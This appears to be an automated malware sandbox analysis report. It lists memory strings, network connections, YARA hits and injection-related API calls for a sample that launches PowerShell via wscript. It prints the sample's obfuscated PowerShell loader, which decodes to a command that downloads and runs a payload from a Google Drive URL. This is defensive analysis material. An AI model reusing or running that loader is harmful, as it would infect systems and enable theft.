Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=6.6.2
Source: powershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/DERYA.gif)
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/NAZAN.gif)
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/aslan.gif
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-180x180.jpeg
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-192x192.jpeg
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-270x270.jpeg
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-32x32.jpeg
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/yatayreklam.jpg
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://schema.org/WPHeader
Source: msiexec.exe String found in binary or memory: https://ssl.gstatic.c
Source: msiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: msiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49740 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_4312.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6044, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03844340 NtSetContextThread,LdrInitializeThunk, 11_2_03844340
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03844650 NtSuspendThread,LdrInitializeThunk, 11_2_03844650
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038435C0 NtCreateMutant,LdrInitializeThunk, 11_2_038435C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842B60 NtClose,LdrInitializeThunk, 11_2_03842B60
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842AD0 NtReadFile,LdrInitializeThunk, 11_2_03842AD0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038439B0 NtGetContextThread,LdrInitializeThunk, 11_2_038439B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842FB0 NtResumeThread,LdrInitializeThunk, 11_2_03842FB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842FE0 NtCreateFile,LdrInitializeThunk, 11_2_03842FE0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842F30 NtCreateSection,LdrInitializeThunk, 11_2_03842F30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842EE0 NtQueueApcThread,LdrInitializeThunk, 11_2_03842EE0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842DD0 NtDelayExecution,LdrInitializeThunk, 11_2_03842DD0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842DF0 NtQuerySystemInformation,LdrInitializeThunk, 11_2_03842DF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842D10 NtMapViewOfSection,LdrInitializeThunk, 11_2_03842D10
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842D30 NtUnmapViewOfSection,LdrInitializeThunk, 11_2_03842D30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842CA0 NtQueryInformationToken,LdrInitializeThunk, 11_2_03842CA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842C60 NtCreateKey,LdrInitializeThunk, 11_2_03842C60
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842C70 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_03842C70
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03843090 NtSetValueKey, 11_2_03843090
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03843010 NtOpenDirectoryObject, 11_2_03843010
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842B80 NtQueryInformationFile, 11_2_03842B80
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842BA0 NtEnumerateValueKey, 11_2_03842BA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842BE0 NtQueryValueKey, 11_2_03842BE0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842BF0 NtAllocateVirtualMemory, 11_2_03842BF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842AB0 NtWaitForSingleObject, 11_2_03842AB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842AF0 NtWriteFile, 11_2_03842AF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842F90 NtProtectVirtualMemory, 11_2_03842F90
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842FA0 NtQuerySection, 11_2_03842FA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842F60 NtCreateProcessEx, 11_2_03842F60
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842E80 NtReadVirtualMemory, 11_2_03842E80
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842EA0 NtAdjustPrivilegesToken, 11_2_03842EA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842E30 NtWriteVirtualMemory, 11_2_03842E30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842DB0 NtEnumerateKey, 11_2_03842DB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842D00 NtSetInformationFile, 11_2_03842D00
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03843D10 NtOpenProcessToken, 11_2_03843D10
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03843D70 NtOpenThread, 11_2_03843D70
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842CC0 NtQueryVirtualMemory, 11_2_03842CC0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842CF0 NtOpenProcess, 11_2_03842CF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842C00 NtQueryInformationProcess, 11_2_03842C00
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03109250 NtClose, 11_2_03109250
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_031090C0 NtReadFile, 11_2_031090C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03108F50 NtCreateFile, 11_2_03108F50
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B75BEA2 1_2_00007FFD9B75BEA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B75B0F6 1_2_00007FFD9B75B0F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B82A42A 1_2_00007FFD9B82A42A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04BCEB70 6_2_04BCEB70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04BCF440 6_2_04BCF440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04BCE828 6_2_04BCE828
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0385739A 11_2_0385739A
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FD34C 11_2_037FD34C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D03E6 11_2_038D03E6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381E3F0 11_2_0381E3F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C132D 11_2_038C132D
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CA352 11_2_038CA352
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038152A0 11_2_038152A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382B2C0 11_2_0382B2C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038902C0 11_2_038902C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382D2F0 11_2_0382D2F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D01AA 11_2_038D01AA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381B1B0 11_2_0381B1B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C81CC 11_2_038C81CC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03800100 11_2_03800100
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038AA118 11_2_038AA118
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DB16B 11_2_038DB16B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0384516C 11_2_0384516C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BF0CC 11_2_038BF0CC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C70E9 11_2_038C70E9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CF0E0 11_2_038CF0E0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CF7B0 11_2_038CF7B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380C7C0 11_2_0380C7C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03834750 11_2_03834750
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C16CC 11_2_038C16CC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382C6E0 11_2_0382C6E0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D0591 11_2_038D0591
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038AD5B0 11_2_038AD5B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810535 11_2_03810535
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C7571 11_2_038C7571
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BE4F6 11_2_038BE4F6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CF43F 11_2_038CF43F
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C2446 11_2_038C2446
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03801460 11_2_03801460
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382FB80 11_2_0382FB80
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C6BD7 11_2_038C6BD7
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03885BF0 11_2_03885BF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0384DBF9 11_2_0384DBF9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CAB40 11_2_038CAB40
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CFB76 11_2_038CFB76
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380EA80 11_2_0380EA80
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03855AA0 11_2_03855AA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038ADAAC 11_2_038ADAAC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BDAC6 11_2_038BDAC6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CFA49 11_2_038CFA49
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C7A46 11_2_038C7A46
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03883A6C 11_2_03883A6C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038129A0 11_2_038129A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DA9A6 11_2_038DA9A6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03819950 11_2_03819950
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382B950 11_2_0382B950
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03826962 11_2_03826962
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038138E0 11_2_038138E0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383E8F0 11_2_0383E8F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387D800 11_2_0387D800
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03812840 11_2_03812840
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381A840 11_2_0381A840
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F68B8 11_2_037F68B8
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811F92 11_2_03811F92
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388EFA0 11_2_0388EFA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CFFB1 11_2_038CFFB1
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03802FC8 11_2_03802FC8
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CFF09 11_2_038CFF09
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852F28 11_2_03852F28
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03830F30 11_2_03830F30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03884F40 11_2_03884F40
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03822E90 11_2_03822E90
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CCE93 11_2_038CCE93
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03819EB0 11_2_03819EB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CEEDB 11_2_038CEEDB
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CEE26 11_2_038CEE26
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810E59 11_2_03810E59
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03828DBF 11_2_03828DBF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382FDC0 11_2_0382FDC0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380ADE0 11_2_0380ADE0
